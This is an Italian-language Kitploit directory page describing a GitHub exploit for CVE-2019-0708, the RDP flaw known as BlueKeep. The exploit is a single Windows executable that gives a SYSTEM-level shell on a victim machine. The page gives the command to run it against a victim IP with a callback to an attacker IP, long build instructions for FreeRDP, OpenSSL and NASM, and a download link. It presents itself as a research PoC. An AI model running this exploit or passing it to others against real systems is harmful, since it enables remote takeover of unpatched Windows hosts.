Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-0708-EXP-Windows — CVE-2019-0708-EXP - versione Windows singolo file exe, dopo l'esecuzione ottiene direttamente una shell con privilegi System nella console corrente. | Kitploit
Strumenti/GitHubGitHub/cbwang505/cve-2019-0708-exp-windows
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodePenetration TestingStrumento di Accesso Remoto
GitHubcbwang505/cve-2019-0708-exp-windows

CVE-2019-0708-EXP-Windows

CVE-2019-0708-EXP - versione Windows singolo file exe, dopo l'esecuzione ottiene direttamente una shell con privilegi System nella console corrente.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi RepositorySito web
31768116 anni faRevisionato da Kitploit
Condividi

CVE-2019-0708-EXP-Windows-Version

Dichiarazione

La PoC dell'autore è fornita esclusivamente a scopo di ricerca. Se il lettore utilizza questa PoC per altri scopi, ciò non è responsabilità dell'autore.

Indice

[toc]

Introduzione

CVE-2019-0708-EXP versione Windows è un singolo file eseguibile, non richiede Linux, Python, Ruby, ecc. Una volta eseguito, apre direttamente una shell con privilegi di Sistema nella console corrente.

La compilazione utilizza la modalità libreria statica con tutti i DLL inlined, integra netcat e OpenSSL, supporta la visualizzazione della barra di avanzamento e l'eco dei comandi nella shell.

Ambiente di riproduzione

  1. Sistema vittima: Windows 7 SP1 x64
  2. Sistema attaccante: Windows 10 x64
  3. Ambiente di compilazione: Visual Studio 2013

Istruzioni per l'uso

  1. Entrare nella directory CVE-2019-0708-EXP-Release
  2. Eseguire wfreerdp.exe /v:IP_Vittima /l:IP_Attaccante, ad esempio
wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17

Tutorial di installazione

  1. Copiare il progetto FreeRDP-master in E:\git\KernelResearch\FreeRDP-master\
  2. Installare l'ambiente di compilazione OpenSSL, oppure estrarre openssl.7z in C:\openssl\ per utilizzare l'ambiente precompilato
  3. Installare l'ambiente di compilazione Nasm
  4. Installare cmake-3.15.3-win64-x64.msi come amministratore
  5. Aggiungere C:\Program Files\CMake\bin alla variabile d'ambiente PATH
  6. Riavviare il computer
  7. Eseguire "C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txt
  8. Compilare il progetto. Se dovessero mancare file, è possibile ripristinarli da FreeRDP-master-restore.7z
Tutorial di installazione dell'ambiente di compilazione OpenSSL
  1. Estrarre openssl-1.0.2s.tar.gz in C:\openssl\
  2. Installare ActivePerl-5.28.1.0000-MSWin32-x64-fde9aa8a.msi
  3. Aggiungere C:\Perl64\bin alla variabile d'ambiente PATH
  4. Aprire il prompt dei comandi nativo x64 di VS2013 (disponibile nel menu Start)
  5. Eseguire perl Configure VC-WIN64A
  6. Eseguire cd /d C:\openssl\
  7. Eseguire ms\do_win64a
  8. Procedere con la compilazione, scegliendo una delle seguenti modalità (nell'EXP è stata utilizzata la modalità libreria statica):
    • Compilare libreria dinamica OpenSSL: nmake -f ms\ntdll.mak
    • Compilare libreria statica OpenSSL: nmake -f ms\nt.mak
    • Testare la libreria dinamica: nmake -f ms\ntdll.mak test
    • Testare la libreria statica: nmake -f ms\nt.mak test
    • Installare la libreria dinamica: nmake -f ms\ntdll.mak install
    • Installare la libreria statica: nmake -f ms\nt.mak install
    • Pulire la compilazione precedente della libreria dinamica: nmake -f ms\ntdll.mak clean
    • Pulire la compilazione precedente della libreria statica: nmake -f ms\nt.mak clean
  9. Al termine, cercare i file libeay32.lib e ssleay32.lib nella directory out32 e copiarli in C:\openssl\lib\
Tutorial di installazione dell'ambiente di compilazione Nasm
  1. Installare nasm-2.14.02-installer-x64.exe come amministratore
  2. Aggiungere C:\Program Files\NASM alla variabile d'ambiente PATH
  3. Estrarre i 3 file da nasmBuildCustomizations.rar in C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\
  4. Nel progetto client->common->freerdp-client, fare clic destro, selezionare "Dipendenze di compilazione" -> "Personalizzazioni di compilazione", quindi spuntare la voce "nasm" (non "masm")
  5. Se in un file .asm qualsiasi nel progetto freerdp-client appare l'opzione "Compila" nel menu contestuale, l'installazione dell'ambiente Nasm è riuscita.

Risultati di esecuzione

Clicca per ingrandire

Hosting del progetto

Il mio indirizzo PoC

Contributi

Autore: ZheJiang Guoli Security Technology, email: [email protected]

Scarica lo strumento